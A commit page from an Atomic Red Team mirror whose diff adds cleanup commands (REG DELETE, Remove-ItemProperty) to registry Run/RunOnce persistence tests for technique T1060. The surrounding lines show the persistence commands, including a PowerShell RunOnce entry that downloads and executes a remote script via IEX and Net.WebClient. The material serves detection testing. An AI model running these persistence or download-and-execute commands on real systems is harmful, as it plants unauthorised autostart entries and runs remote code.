security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Adding removal of registry keys for T1060 based on issue #328

Browse Source
This commit is contained in:
Josh Rickard
2018-09-06 21:56:10 -04:00
parent 7073f4274e
commit 823766d2c9
1 changed files with 3 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1060/T1060.yaml
+3
View File
@@ -20,6 +20,7 @@ atomic_tests:
name: command_prompt
command: |
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
- name: Reg Key RunOnce
description: |
RunOnce Key Persistence
@@ -37,6 +38,7 @@ atomic_tests:
name: command_prompt
command: |
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
- name: PowerShell Registry RunOnce
description: |
RunOnce Key Persistence via PowerShell
@@ -55,6 +57,7 @@ atomic_tests:
command: |
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
- name: Startup Folder
description: |
Add Shortcut To Startup via PowerShell